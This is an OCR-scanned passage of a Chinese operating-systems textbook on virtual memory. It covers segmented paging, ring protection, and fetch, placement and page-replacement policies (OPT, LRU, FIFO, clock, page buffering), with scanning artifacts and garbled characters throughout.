
分 页 机 制 


图 8.13” 段 页 式 系 统 中 的 地 址 转换 
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图 8.13 给 出 了 支持 段 页 式 的 一 个 结构 (与 图 8.5 类 似 )。 每 个 进程 使 用 一 个 段 表 和 一 些 页 表 ， 
并 且 每 个 进程 段 使 用 一 个 页 表 。 当 一 个 特定 的 进程 运行 时 , 使 用 一 个 寄存 器 记录 该 进程 段 表 的 起 
始 地 址 。 对 每 一 个 虚拟 地 址 ,处 理 器 使 用 段 号 部 分 来 检索 进程 段 表 以 寻找 该 段 的 页 表 。 然 后 虚拟 
地 址 的 页 号 部 分 用 于 检索 页 表 并 查找 相应 的 页 框 号 。 这 结合 了 虚拟 地 址 的 偏 移 部 分 来 产生 需 
要 的 实地 址 。 

图 8.2: 说 明了 段 表 项 和 页 表 项 的 格式 。 段 表 项 包含 段 的 长 度 ， 还 包含 一 个 基 域 ， 这 个 基 域 
现在 指向 一 个 页 表 , 这 时 不 需要 存在 位 和 修改 位 , 因为 和 它们 相关 的 问题 将 在 页 一 级 处 理 。 此 外 ， 
还 可 能 需要 用 于 基于 共享 和 保护 目的 的 其 他 控制 位 。 页 表 项 在 本 质 上 与 纯粹 的 分 页 系统 中 的 相同 ， 
如 果 某 一 页 在 内 存 中 ， 则 它 的 页 号 被 映射 到 一 个 相应 的 页 框 号 。 修 改 位 表明 当 该 页 框 被 分 配给 其 
他 页 时 ， 这 一 页 是 否 需 要 写 回 。 还 可 能 有 一 些 别 的 控制 位 ， 用 于 处 理 保 护 或 其 他 存储 管理 特征 。 


8.1.5 ”保护 和 共享 


分 段 有 助 于 实现 保护 与 共享 机 制 。 由 于 每 个 段 表 项 包 Mii yy 
括 一 个 长 度 和 一 个 基地 址 ， 因 而 程序 不 会 不 经 意 地 访问 超 0 
出 该 段 的 内 存单 元 。 为 实现 共享 ， 一 个 段 可 能 在 多 个 进程 B 
的 段 表 中 被 引用 。 当 然 ， 在 分 页 系统 中 也 可 以 得 到 同样 的 。 一 
机 制 。 但 是 ， 此 种 情况 下 程序 的 页 结构 和 数据 对 程序 员 不 
可 见 ,使 得 共享 和 保护 的 要 求 难以 说 明 。 图 8.14 说 明了 这 
类 系统 中 可 以 实施 的 保护 关系 的 类 型 。 

同时 也 存在 更 高 级 的 机 制 ， 一 个 常用 的 方案 是 使 用 环 
状 保护 结构 ( 参见 第 3 章 图 3.18 )。 在 这 个 方案 中 , 编号 小 
的 内 环比 编号 大 的 外 环 具 有 更 大 的 特权 。 在 典型 情况 下 , 0 
号 环 为 操作 系统 的 内 核 函 数 保留 ， 应 用 程序 则 位 于 更 高 层 
的 环 。 一 些 实用 工具 程序 或 操作 系统 服务 可 能 占据 了 中 间 
的 环 。 环 状 系统 的 基本 原理 如 下 : 

1 ) 程 序 可 以 只 访问 驻 留 在 同一 个 环 或 更 低 特 权 环 中 的 
数据 。 图 8.14 段 之 间 的 保护 关系 


2 ) 程序 可 以 调用 驻 留 在 相同 或 更 高 特权 环 中 的 服务 。 


8.2 ”操作 系统 软件 


操作 系统 的 内 存 管理 设计 取决 于 三 个 基本 方面 的 选择 : 

o 是 否 使 用 虚拟 内 存 技术 。 

@ 使 用 分 页 还 是 分 段 ， 或 者 是 二 者 的 组 合 。 

© 为 各 种 存储 管理 特征 采用 的 算法 。 

前 两 个 方面 中 的 选择 取决 于 使 用 的 硬件 平台 。 因 此 ,早期 的 UNIX 实现 中 没有 提供 虚拟 内 
存 ， 是 由 于 该 系统 运行 的 处 理 器 不 支持 分 页 或 分 段 。 如 果 没 有 对 地 址 转换 和 其 他 基本 功能 的 硬 
件 支持 ， 则 这 些 技 术 都 是 不 能 达到 实用 的 。 

对 前 两 个 方面 还 有 两 个 附加 的 说 明 : 首先 ， 除 了 一 些 老式 个 人 计算 机 上 的 操作 系统 〈 如 
MS-DOS) 和 特殊 的 系统 外 ， 所 有 重要 的 操作 系统 都 提供 了 虚拟 内 存 。 其 次 ， 纯 粹 的 分 段 系 统 现 
在 越 来 越 少 , 当 分 段 与 分 页 结合 起 来 后 , 操作 系统 所 面临 的 大 多 数 内 存 管理 问题 都 是 关于 分 页 方 
面 的 9 。 因 此 ， 本 节 将 集中 探讨 与 分 页 有 关 的 问题 。 






| 分 派 器 | 
| 不 允许 访问 


O “在 段 页 式 的 系统 中 ， 保 护 和 共享 通常 在 段 级 进行 处 理 。 这 些 话题 将 在 后 面 的 章节 中 讨论 。 
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与 第 三 方面 相关 的 选择 是 属于 操作 系统 软件 领域 的 问题 , 也 是 本 节 的 主题 。 表 8.4 列 出 了 需 
要 考虑 的 重要 的 设计 因素 。 在 各 种 情况 下 ,最 重要 的 都 是 与 性 能 相关 的 问题 , 由 于 缺 页 中 断 带 来 
巨大 的 软件 开销 , 所 以 希望 使 缺 页 中 断 发 生 的 频率 最 小 。 这 类 开销 至 少 包括 决定 置换 哪个 或 娜 些 
驻 留 页 以 及 交换 这 些 页 所 需要 的 IO 操作。 此 外 ， 在 这 个 页 IO 操作 的 过 程 中 ， 操 作 系统 还 必须 
调度 男 一 个 进程 运行 ， 即 导致 一 次 进程 切换 。 因 此 ,希望 能 通过 适当 的 安排 , 使 得 在 一 个 进程 正 
在 执行 时 ,访问 一 个 未 命中 的 页 中 的 字 的 可 能 性 最 小 。 在 表 8.4 中 给 出 的 所 有 策略 中 ， 都 不 存在 
一 种 绝对 的 最 佳 策略 。 在 分 页 环境 中 的 内 存 管 理 任务 是 极其 复杂 的 。 此 外 , 任何 特定 策略 的 总 性 
能 取决 于 内 存 的 大 小 、 内 存 和 外 存 的 相对 速度 、 竞 争 资源 的 进程 大 小 和 数目 以 及 单个 程序 的 执行 
情况 。 最 后 一 个 特性 取决 于 应 用 程序 的 类 型 、 所 采用 的 程序 设计 语言 和 编译 器 、 编写 该 程序 的 程 
序 员 的 风格 和 用 户 的 动态 行为 ( 交互 式 程序 )。 因 此 ， 不 要 期 望 在 本 书 或 者 在 任何 地 方 会 有 一 个 
最 终 答案 。 对 于 小 系统 ,操作 系统 设计 者 可 以 试图 基于 当前 的 状态 信息 , 选择 一 组 看 上 去 在 大 多 
数 条 件 下 都 比较 “好 ”的 策略 ; 而 对 于 大 系统 ,特别 是 大 型 机 ,操作 系统 应 该 配备 监视 和 控制 工 
具 ， 人 多 许 系统 管理 员 根据 系统 状态 调整 操作 系统 ， 以 获得 比较 “好 ”的 结果 。 


表 8.4 用 于 虚拟 内 存 的 操作 系统 策略 








读 取 策略 驻 留 集 管理 
请 求 分 页 驻 留 集合 大 小 
预先 分 页 fal 

放置 策略 可 变 

置换 策略 置换 范围 

基本 算法 全 局 

最 优 局 部 

最 近 最 少 使 用 算法 (LRU) 清除 策略 

先进 先 出 算法 (FIFO) 请 求 式 清除 

nt $b 预约 式 清除 meh 
页 缓冲 装 入 控制 


系统 并 发 度 





8.2.1 BMRB 


读 取 策略 确定 一 个 页 何 时 取 入 内 存 ， 常 用 的 两 种 方法 是 请 求 分 页 ( demand paging) 和 预先 
分 页 ( prepaging )。 对 于 请 求 分 页 ， 只 有 当 访 问 到 某 页 中 的 一 个 单元 时 才 将 该 页 取 人 内 存 。 如 果 
内 存 管理 的 其 他 策略 比较 合适 ， 将 发 生 下 述 情况 ; 当 一 个 进程 第 一 次 启动 时 , 会 在 一 段 时 间 出 现 
大 量 的 缺 页 中 断 ; 当 越 来 越 多 的 页 被 取 人 后 , 局 部 性 原理 表明 大 多 数 将 来 访问 的 页 都 是 最 近 读 取 
的 页 。 因 此 ， 在 一 段 时 间 后 错误 会 逐渐 减少 ， 缺 页 中 断 的 数目 会 降 到 很 低 。 

对 于 预先 分 页 , 读 取 的 页 并 不 是 缺 页 中 断 请 求 的 页 。 预 先 分 页 利用 了 大 多 数 辅 存 设 备 ( 如 磁 
盘 ) 的 特性 ,这 些 设备 有 寻 道 时 间 和 合理 的 延迟 。 如 果 一 个 进程 的 页 被 连续 存储 在 辅 存 中 , 则 一 
次 读 取 许 多 连续 的 页 比 隔 一 段 时 间 读 取 一 页 要 更 有 效 。 当 然 , 如 果 大 多 数额 外 读 取 的 页 没有 引用 
到 ， 则 这 个 策略 是 低 效 的 。 

当 进 程 第 一 次 启动 时 , 可 以 采用 预先 分 页 策略 , 在 这 种 情况 下 , 程序 员 必 须 以 某 种 方式 指定 
需要 的 页 ; 当 发 生 缺 页 中 断 时 也 可 以 采用 预先 分 页 策略 ,由 于 这 个 过 程 对 程序 员 是 不 可 见 的 , 因 
而 它 显得 更 可 取 一 些 。 但 是 ,预先 分 页 的 实用 工具 程序 还 没有 建立 [MAEK87 l 

不 要 把 预先 分 页 和 交换 混淆 。 当 一 个 进程 被 换 出 内 存 并 且 被 置 于 挂 起 状态 时 , 它 的 所 有 驻 留 
页 都 被 换 出 。 当 该 进程 被 唤醒 时 ， 所 有 以 前 在 内 存 中 的 页 都 被 重新 读 回 内 存 。 





8.2.2 ”放置 策略 


放置 策略 决定 一 个 进程 块 驻 留 在 实 存 中 的 什么 地 方 。 在 一 个 纯粹 的 分 段 系 统 中 , 放置 策略 并 
不 是 重要 的 设计 问题 , 第 7 章 讲述 的 诸如 最 佳 适 配 、 首 次 适 配 等 都 可 供 选 择 。 但 对 于 纯粹 的 分 页 
系统 或 段 页 式 的 系统 , 如 何 放置 通常 是 没有 关系 的 , 这 是 因为 地 址 转换 硬件 和 内 存 访问 硬件 可 以 
以 相同 的 效率 为 任何 页 框 组 合 执行 它们 的 功能 。 

还 有 一 个 关注 放置 问题 的 领域 是 非 一 致 存储 访问 ( NonUniform Memory Access, NUMA ) 
多 处 理 器 。 在 非 一 致 存储 访问 多 处 理 器 中 , 机 器 中 分 布 的 共享 内 存 可 以 被 该 机 器 的 任何 处 理 器 
访问 , 但 是 访问 某 一 特定 的 物理 单元 所 需要 的 时 间 随 着 处 理 器 和 内 存 模 块 之 间距 离 的 不 同 而 变 
化 。 因 此 ,其 性 能 很 大 程度 上 依赖 于 数据 驻 留 的 位 置 与 使 用 数据 的 处 理 器 间 的 距离 [ LARO92， 
BOLO89，COX89 ]。 对 于 NUMA 系统 ， 自 动 放置 策略 希望 能 把 页 分 配 到 能 够 提供 最 佳 性 能 的 
内 存 。 


8.2.3 ”置换 策略 


在 大 多 数 操作 系统 教材 中 ， 有关 内存 管理 的 内 容 都 包括 题目 为 “置换 策略 ”的 一 节 ， 用 于 处 
理 在 必须 读 取 一 个 新 页 时 , 应 该 置换 内 存 中 的 哪 一 页 。 由 于 涉及 许多 概念 ,阐明 这 方面 的 主题 有 
一 定 的 困难 : 

@ 给 每 个 活动 进程 分 配 多 少 页 框 。 

@ 计划 置换 页 的 集合 是 局 限 在 那些 产生 缺 页 中 断 的 进程 ， 还 是 所 有 页 框 都 在 内 存 中 的 进程 。 

@ 在 计划 置换 的 页 集中 ， 选 择 换 出 哪 一 个 页 。 

前 两 个 概念 称 做 驻 留 集 管理 , 其 内 容 将 在 下 一 节 讨论 ; 术语 “置换 策略 ”用 于 专 指 第 三 个 概 
念 ， 本 节 将 讲述 这 方面 的 内 容 。 

置换 策略 在 内 存 管 理 的 各 个 领域 都 得 到 了 广泛 的 研究 。 当 内 存 中 的 所 有 页 框 都 被 占据 , 并 且 
需要 读 取 一 个 新 页 以 处 理 一 次 缺 页 中 断 时 , 置换 策略 决定 当前 在 内 存 中 的 哪个 页 将 被 置换 。 所 有 
策略 的 目标 都 是 移出 最 近 最 不 可 能 访问 的 页 。 由 于 局 部 性 原理 , 最 近 的 访问 历史 和 最 近 将 要 访问 
的 模式 间 有 很 大 的 相关 性 。 因 此 , 大 多 数 策略 都 基于 过 去 的 行为 来 预测 将 来 的 行为 。 必 须 折 中 考 
虑 的 是 ， 置 换 策 略 设计 得 越 精致 、 越 复杂 ， 实 现 它 的 软 硬 件 开销 就 越 大 。 
页 框 锁定 

在 分 析 各 种 算法 前 , 需要 注意 的 是 关于 置换 策略 的 一 个 约束 : 内 存 中 的 某 些 页 框 可 能 是 被 锁 
定 的 。 如 果 一 个 页 框 被 锁定 时 ， 当 前 保存 在 该 页 框 中 的 页 就 不 能 被 置换 。 大 部 分 操作 系统 内 核 和 
重要 的 控制 结构 就 保存 在 锁定 的 页 框 中 ， 此 外 ，LO 缓冲 区 和 其 他 对 时 间 要 求 严 格 的 区 域 也 可 能 
锁定 在 内 存 的 页 框 中 。 锁 定 是 通过 给 每 个 页 框 关联 一 个 lock 位 实现 的 ， 这 一 位 可 以 包含 在 页 框 
表 和 当前 的 页 表 中 。 


t? 


基本 算法 Animation: Rage Replacement Algorithms 
不 论 采 用 哪 种 驻 留 集 管理 策略 ( 在 下 一 节 讲 述 )， 都 有 一 些 用 于 选择 置换 页 的 基本 算法 。 在 
文献 中 可 以 查 到 的 置换 算法 包括 : BE (OPT )、 最 近 最 少 使 用 ( LRU )、 先 进 先 出 (FIFO )、 
时 钟 。 
OPT 策略 选择 置换 下 次 访问 距 当前 时 间 最 长 的 那些 页 ， 可 以 看 出 该 算法 能 导致 最 少 的 缺 页 
中 断 | BELA66 ], 但 是 由 于 它 要 求 操作 系统 必须 知道 将 来 的 事件 ， 显 然 这 是 不 可 能 实现 的 。 但 
是 它 仍 能 作为 一 种 标准 来 衡量 其 他 算法 的 性 能 。 
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图 8.15 给 出 了 关于 OPT 策略 的 一 个 例子 ， 该 例子 假设 固定 的 为 该 进程 分 配 3 个 页 框 〈 驻 贸 
集合 大 小 固定 )。 进 程 的 执行 需要 访问 5 个 不 同 的 页 ， 运 行 该 程序 需要 的 页 地 址 的 顺序 为 ; 
232152453252 

这 意味 着 访问 的 第 一 个 页 是 2， 第 二 个 页 是 3， 依 此 类 推 。 当 页 框 分 配 满 了 以 后 ，OPT 策略 
产生 3 次 缺 页 中 断 。 

LRU 策略 置换 内 存 中 上 次 使 用 距 当 前 最 远 的 页 。 根 据 局 部 性 原理 ， 这 也 是 最 近 最 不 可 能 访 
问 到 的 页 。 实 际 上 ，LRU 策略 的 性 能 接近 于 OPT 策略 。 该 方法 的 问题 在 于 比较 难于 实现 。 一 种 
实现 方法 是 给 每 一 页 添加 一 个 最 后 一 次 访问 的 时 间 标 签 , 并 且 必须 在 每 次 访问 存储 器 时 , 都 更 新 
这 个 标签 。 即 使 有 支持 这 种 方案 的 硬件 , 开销 仍然 是 非常 大 的 。 另 一 种 可 选择 的 方法 是 维护 一 个 
关于 访问 页 的 栈 ， 但 开销 同样 很 大 。 

图 8.15 给 出 了 关于 LRU 行为 的 一 一 个 例子 ， 它 使 用 与 前 面 OPT 策略 的 例子 相同 的 页 地 址 顺 
序 。 在 这 个 例子 中 会 产生 4 次 缺 页 中 断 。 


页 地 址 流 2 
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F 表示 页 框 分 配 最 初 填 满 时 出 现 页 错误 
图 8.15$ 4 种 页 面 置换 算法 的 行为 


FIFO 策略 把 分 配给 进程 的 页 框 看 做 是 一 个 循环 缓冲 区 ， 按 循环 方式 移动 页 。 它 所 需要 的 只 
是 一 个 指针 ， 这 个 指针 在 该 进程 的 页 框 中 循环 。 因 此 这 是 一 种 实现 起 来 最 简单 的 页 面 置换 策略 。 
除了 它 的 简单 性 , 这 种 选择 方法 所 隐 含 的 逻辑 是 置换 驻 留 在 内 存 中 时 间 最 长 的 页 : 一 个 在 很 久 以 
前 取 和 人 内 存 的 页 ， 到 现在 可 能 已 经 不 会 再 用 到 了 。 这 个 推断 常常 是 错误 的 ， 因 为 经 常会 出 现 一 部 
分 程序 或 数据 在 整个 程序 的 生命 周期 中 使 用 频率 都 很 高 的 情况 ， 如 果 使 用 FIFO 算法 ， 则 这 些 页 
会 反复 地 需要 被 换 人 换 出 。 

继续 图 8.15 中 的 例子 ，FIFO 策略 导致 了 6 次 缺 页 中 断 。 注 意 到 LRU 识别 出 页 2 和 页 5 比 
其 他 页 的 访问 频率 高 ， 而 FIFO 却 没 有 。 


Animation: Clock Algoritims 

RE LRU 策略 几乎 与 OPT 策略 一 样 好 , 但 是 它 的 实现 比较 困难 ,而且 需要 大 量 的 开销 。 另 
一 方面 ，FIFO 策略 实现 简单 ， 但 性 能 相对 较 差 。 这 些 年 以 来 ， 操 作 系 统 的 设计 者 尝试 了 很 多 其 
他 的 算法 ， 试 图 以 较 小 的 开销 接近 LRU 的 性 能 。 许 多 这 类 算法 都 是 称 为 时 钟 策略 的 各 种 变 体 。 
最 简单 的 时 钟 策略 需要 给 每 一 页 框 关联 一 个 附加 位 , 称 为 使 用 位 。 当 某 一 页 首次 装 人 内 存 中 - 

时 ， 则 将 该 页 框 的 使 用 位 设置 为 1; 当 该 页 随后 被 访问 到 时 (在 访问 产生 缺 页 中 断 之 后 )， 它 的 
使 用 位 也 会 被 置 为 1。 对 于 页 面 置 换算 法 ， 用 于 置换 的 候选 页 框 集合 ( 当前 进程 : 局 部 范围 ; 整 
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A: 全 局 范围 9) 被 看 做 是 一 个 循环 缓冲 区 , 并 且 有 一 个 指针 与 之 相关 联 。 当 一 页 被 置换 时 ， 
该 指针 被 设置 成 指向 缓冲 区 中 的 下 一 页 框 。 当 需要 置换 一 页 时 , 操作 系统 扫描 缓冲 区 , 以 查找 使 
用 位 被 置 为 0 的 一 页 框 。 每 当 遇 到 一 个 使 用 位 为 1 的 页 框 时 ,操作 系统 就 将 该 位 重新 置 为 0; 如 
果 在 这 个 过 程 开始 时 ,缓冲 区 中 所 有 页 框 的 使 用 位 均 为 0， 则 选择 过 到 的 第 一 个 页 框 置换 ; 如 果 
所 有 页 框 的 使 用 位 均 为 1， 则 指针 在 缓冲 区 中 完整 地 循环 一 周 ， 把 所 有 使 用 位 都 置 为 0， 并 且 停 
留 在 最 初 的 位 置 上 ， 置 换 该 页 框 中 的 页 。 可 见 ， 该 策略 类 似 于 FIFO， 唯 一 不 同 的 是 ， 在 时 钟 策 
略 中 使 用 位 为 1 的 页 框 被 跳 过 。 该 策略 之 所 以 称 为 时 钟 策略 , 是 因为 可 以 把 页 框 形 象 地 想象 成 在 
一 个 环 中 。 许 多 操作 系统 都 采用 这 种 简单 时 钟 策略 的 某 种 变 体 (如 Multics | CORB68 ] )。 

图 8.16 给 出 了 关于 简单 时 钟 策略 的 一 个 例子 。 一 个 由 关 个 内 存 页 框 组织 的 循环 缓冲 区 可 用 
于 页 面 置 换 。 当 页 727 进 人 时 , 在 从 缓冲 区 中 选 出 一 页 进行 置换 之 前 , 下 一 页 框 指针 指向 含有 页 
45 的 页 框 2。 现 在 开始 执行 时 钟 策略 。 由 于 页 框 2 中 页 45 的 使 用 位 等 于 1， 因 而 该 页 不 能 被 置 
换 ， 相 反 ， 把 该 页 的 使 用 位 重新 置 为 0， 指针 继续 前 进 。 类 似 地 ， 页 框 3 中 的 页 191 也 不 能 被 置 
换 ， 其 使 用 位 被 置 成 0， 指 针 继 续 前 进 。 下 一 页 框 是 页 框 4， 它 的 使 用 位 为 0， 因 此， 页 556 被 
页 727 置换 ， 该 页 框 的 使 用 位 被 置 为 1， 指 针 继续 前 进 到 页 框 5， 完 成 页 面 置换 过 程 。 


用 于 替换 的 候选 页 杠 
Aiea 


1 





a) 在 替换 一 页 前 缓冲 区 的 状态 b) 下 一 页 被 替换 后 缓冲 的 状态 
图 8.16 关于 时 钟 策略 的 一 个 例子 


图 8.15 中 说 明了 时 钟 策略 的 行为 。 星 号 表示 相应 的 使 用 位 等 于 1, 箭头 表示 指针 的 当前 位 
置 。 注 意 ， 时 钟 策略 可 以 防止 页 框 2 和 页 框 5 被 置换 。 

图 8.17 给 出 了 [ BAER80 ] 中 的 一 个 实验 结果 , 该 实验 比较 了 前 面 讨论 的 4 个 算法 ; 它 假设 
分 配给 一 个 进程 的 页 框 数目 是 固定 的 ， 其 结果 基于 在 一 个 FORTRAN 程序 中 执行 0.25 x 10 次 访 
H, BADA 256 个 字 。Baer 分 别 在 分 配 6、8、10、12 和 14 页 框 的 情况 下 进行 了 实验 。 当 分 
配 的 页 框 数目 比较 小 时 ，4 种 策略 的 差别 非常 显著 ，FIFO 比 OPT 几乎 差 了 2 倍 。 这 里 访问 某 一 
页 的 概率 分 布 情况 几乎 是 相同 的 ， 如 图 8.11b 所 示 。 为 了 更 高 效 地 执行 , 希望 能 既 处 于 曲线 拐角 
的 右 侧 (保证 小 的 缺 页 率 ), 又 能 保证 小 的 页 框 分 配 ( 处 于 曲线 拐角 的 左 侧 )。 这 两 个 约束 表明 需 
要 的 操作 模式 应 该 是 在 曲线 的 拐角 。 


O 范围 的 概念 将 在 “置换 范围 ”中 详细 讨论 。 
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8 10 12 14 
分 配 的 页 框 数目 


图 8.17 ”固定 分 配 、 局 部 页 面 置 换算 法 的 比较 


[FINK88] 中 报告 了 几乎 完全 一 致 的 结果 ， 表 明 几 种 方法 最 多 相差 两 倍 。Finkel 从 一 个 包含 
100 页 多 虚拟 空间 选 出 10 000 个 访问 组 成 一 个 综合 的 页 访问 字符 串 ， 以 此 来 仿真 多 个 策略 的 效 
果 。 为 了 近似 局 部 性 原理 的 效果 ， 规 定 访问 一 个 特定 的 页 的 可 能 性 满足 指数 分 布 。Finkel 指出 ， 
有 部 分 人 因为 数据 仅 相差 了 两 倍 , 就 得 出 设计 复杂 页 面 置换 算法 没有 什么 意义 的 结论 。 同 时 他 还 
说 明 这 个 差别 将 对 内 存 的 需求 (为 避免 降低 操作 系统 性 能 ) 或 操作 系统 性 能 ( 为 避免 扩大 内 存 ) 
产生 重大 的 影响 。 

当 使 用 可 变 分 配 和 全 局 或 局 部 置换 范围 时 (请 参阅 下 面 关 于 策略 的 讨论 )， 也 有 关于 时 钟 算 
法 与 其 他 算法 的 比较 [ CARR81，CARR84 ]。 时 钟 算法 的 性 能 非常 接近 于 LRU。 

可 以 通过 增加 使 用 的 位 数目 ， 可 以 使 时 钟 算 法 更 加 有 效 8 。 在 所 有 支持 分 页 的 处 理 器 中 ， 
肉 存 中 的 每 一 页 都 有 一 个 修改 位 与 之 关联 ,因此 内 存 中 的 每 一 页 框 也 与 这 些 修改 位 相关 联 。 修 
改 位 是 必需 的 ,如果 一 页 被 修改 了 ， 在 它 被 写 回 辅 存 之 前 不 会 被 置换 出 。 可 以 按照 下 面 的 方式 
在 时 钟 算法 中 利用 这 一 位 。 如 果 一 起 考虑 使 用 位 和 修改 位 , 那么 每 一 页 框 都 处 于 以 下 4 种 情况 
之 一 : 

o 最 近 未 被 访问 ， 也 未 被 修改 (w=0; m=0) 

@ 最 近 被 访问 ,但 未 被 修改 (w=1; m=0) 

@ 最 近 未 被 访问 ,但 被 修改 (w=0; m=1) 

o 最 近 被 访问 ， 被 修改 (w=1; m=1) 

根据 这 个 分 类 ， 时 钟 算法 的 执行 如 下 : 

1) 从 指针 的 当前 位 置 开始 , 扫描 页 框 缓冲 区 。 在 这 次 扫描 过 程 中 ,对 使 用 位 不 做 任何 修改 。 

选择 遇 到 的 第 一 个 页 框 (w=0; m=0 ) 用 于 置换 。 

2) 如 果 第 1 步 失 败 ， 则 重新 扫描 ， 查 找 (w=0; m=1 ) 的 页 框 。 选 择 第 一 个 遇 到 的 这 样 的 页 

框 用 于 置换 。 在 这 个 扫描 过 程 中 ， 对 每 个 跳 过 的 页 框 ， 把 它 的 使 用 位 设置 成 0。 

3) 如 果 第 2 步 失败 ， 指 针 将 回 到 它 的 最 初 位 置 ， 并 且 集 合 中 所 有 页 框 的 使 用 位 均 为 0。 重 
复 第 1 步 ， 并 且 ， 如 果 有 必要 ， 重 复 第 2 步 。 这 样 将 可 以 找到 供 置换 的 页 框 。 

总 之 , 页 面 置换 算法 在 缓冲 区 的 所 有 页 中 循环 , 查找 自从 被 取 人 到 现在 从 未 被 修改 过 且 最 近 
没有 访问 过 的 页 。 这 样 的 页 最 适合 置换 ， 并 且 还 有 一 个 优点 是 ,由 于 未 被 修改 ， 它 不 需要 被 写 回 
辅 存 。 如 果 在 第 一 次 扫描 过 程 中 没有 找到 候选 页 , 则 算法 再 次 在 缓冲 区 中 开始 循环 , 查找 最 近 未 
被 访问 过 但 被 修改 过 的 页 。 即 使 置换 这 样 的 页 必须 先 写 回 , 但 由 于 局 部 性 原理 , 它 不 会 很 快 又 需 
要 用 到 。 如 果 第 二 次 扫描 失败 , 则 缓冲 区 中 的 所 有 页 框 都 被 标记 为 最 近 没 有 访问 过 , 执行 第 三 次 
扫描 。 


O 另 一 方面 ,如 果 将 使 用 的 位 数 减少 至 零 ， 则 时 钟 算法 就 退化 为 FIFO。 
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该 策略 用 于 较 早 版 本 的 Macintosh 虚拟 内 存 方案 中 [ GOLD89 ]， 如 图 8.18 所 示 。 该 算法 优 
于 简单 时 钟 算法 之 处 在 于 置换 时 首选 没有 变化 的 页 。 由 于 修改 过 的 页 在 被 置换 之 前 必须 写 回 ， 
因而 这 样 做 会 节省 时 间 。 


循环 缓冲 区 中 该 进程 
的 第 一 个 页 框 
0 


3 最 后 被 替换 








图 8.18 ”时 钟 页 面 置 换算 法 [GOLD89 ] 


页 缓冲 

尽管 LRU 和 时 钟 策略 比 FIFO 更 高 级 ， 但 FIFO 却 没 有 像 它 们 那样 涉及 复杂 性 和 开销 问题 。 
此 外 ,还 有 一 个 相关 问题 是 ， 置换 一 个 被 修改 过 的 页 其 代价 比 置换 没有 被 修改 过 的 页 要 大 ,这 
是 由 于 前 者 需要 写 回 辅 存 。 

一 种 可 以 提高 分 页 的 性 能 并 且 人 允许 使 用 较 简 单 的 页 面 置换 策略 的 方法 是 页 缓冲 。 比 较 有 代 
表 性 的 是 VAX VMS 方法 ， 它 的 页 面 置 换算 法 是 简单 的 FIFO。 为 了 提高 性 能 ， 被 置换 出 的 页 不 
是 被 丢弃 ， 而 是 被 分 配 到 以 下 两 个 表 之 一 : 如 果 未 被 修改 ， 则 分 配 到 空闲 页 表 ， 如 果 修 改 了 , M 
分 配 到 修改 页 表 。 注 意 ,该 页 不 是 在 内 存 中 发 生物 理 移 动 ， 而 是 该 页 对 应 的 页 表 项 被 移动 ， 并 放 
置 在 空闲 页 表 中 或 修改 页 表 中 。 

空闲 页 表 包 含 着 页 中 可 以 读 取 的 一 系列 页 框 。VMS 试图 在 任何 时 刻 保留 一 小 部 分 空闲 块 。 
当 需 要 读 取 一 个 页 时 ,使 用 位 于 列表 头 部 的 页 框 ， 置 换 原 本 在 那个 位 置 的 页 。 当 一 个 未 经 修改 的 
页 被 置换 时 ， 它 仍然 在 内 存 中 ， 并 且 它 的 页 框 被 添加 到 空闲 页 表 的 尾部 。 与 此 类 似 ， 当 一 个 被 修 
改过 的 页 被 写 出 和 置换 时 ， 它 的 页 框 也 被 添加 到 空闲 页 表 的 尾部 。 

这 些 操作 的 一 个 重要 特征 是 被 置换 的 页 仍然 保留 在 内 存 中 。 因 此 ,如 果 进 程 访问 该 页 , WE 
可 以 迅速 返回 该 进程 的 驻 留 集合 , 并 和 且 代 价 很 小 。 实际 上 , 空闲 页 表 和 修改 页 表 充 当 着 页 的 高 速 
— 修改 页 表 还 有 另外 一 种 很 有 用 的 功能 : 被 修改 的 页 以 簇 方式 写 回 , 而 不 是 一 KAS 

， 这 就 大 大 减少 了 IO 操作 的 数目 ， 从 而 减少 了 磁盘 访问 时 间 。 

a ee ee. 


置换 策略 和 高 速 缓存 大 小 
正如 前 面 所 讨论 的 ， 随 着 内 存 越 来 越 大 ,应 用 的 局 部 性 特性 逐渐 降低 。 作 为 补偿 ， 高 速 缓存 
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的 大 小 也 相应 地 增加 了 。 比 较 大 的 高 速 缓存 , 甚至 是 几 兆 字 节 的 高 速 缓存 ， 现 在 也 属于 合理 的 设 
计 选 择 [BORG90 ]。 对 于 大 的 高 速 绥 存 ， 虚 拟 内 存 页 的 置换 对 性 能 可 能 会 有 所 影响 。 如 果 选 择 
置换 的 页 框 在 高 速 缓 存 中 ， 则 该 高 速 缓存 块 以 及 保存 在 块 中 的 页 都 会 失效 。 

对 于 使 用 某 种 形式 页 缓冲 的 系统 , 有 可 能 通过 为 页 面 置 换 策略 补充 一 个 在 页 缓冲 区 中 的 页 
放置 策略 来 提高 高 速 缓存 的 性 能 .大 多 数 操作 系统 通过 从 页 缓冲 区 中 选择 一 个 任意 的 页 框 来 放置 
页 ， 并 且 通 常 使 用 FIFO 原则 。[ KESS92 ] 中 的 研究 报告 表明 ， 一 个 细致 的 页 放置 策略 比 任意 放 
置 可 以 减少 10% ~ 20% 的 高 速 缓存 失 误 。 

[KESS92 ] 中 分 析 了 几 种 页 放置 算法 ,其 具体 内 容 基 于 高 速 缓存 结构 和 策略 细节 , 超出 了 本 
书 的 范围 。 这 些 策略 的 本 质 是 为 减少 映射 到 同一 个 高 速 缓存 槽 的 页 框 的 数目 , 按 这 种 方式 把 连续 
的 页 取 入 内 存 。 


8.24 驻 留 集 管理 


驻 留 集 大 小 

对 于 分 页 式 的 虚拟 内 存 , 在 准备 执行 时 ,不 需要 也 不 可 能 把 一 个 进程 的 所 有 页 都 读 取 到 内 
存 。 因 此 ， 操 作 系 统 必须 决定 读 取 多 少 页 ， 也 就 是 说 ， 给 特定 的 进程 分 配 多 大 的 内 存 空 间 。 这 
需要 考虑 以 下 几 个 因素 : 

e 分 配给 一 个 进程 的 存储 量 越 小 ， 在 任何 时 候 驻 留 在 内 存 中 的 进程 数 就 越 多 。 这 就 增加 了 

操作 系统 至 少 找到 一 个 就 绪 进 程 的 可 能 性 ， 从 而 减少 了 由 于 交换 而 消耗 的 处 理 器 时 间 。 

@ 如 果 一 个 进程 在 内 存 中 的 页 数 比 较 少 ， 尽 管 有 局 部 性 原理 ， 缺 页 率 仍然 相对 较 高 ， 如 图 

8.11b 所 示 。 

@ 给 特定 的 进程 分 配 的 内 存 空间 超过 一 定 的 大 小 后 ， 由 于 局 部 性 原理 ， 该 进程 的 缺 页 率 没 

有 明显 的 变化 。 

基于 这 些 因素 ， 当 代 操 作 系统 通常 采用 两 种 策略 。 固 定 分 配 策略 〈fixed-allocation ) 为 一 个 
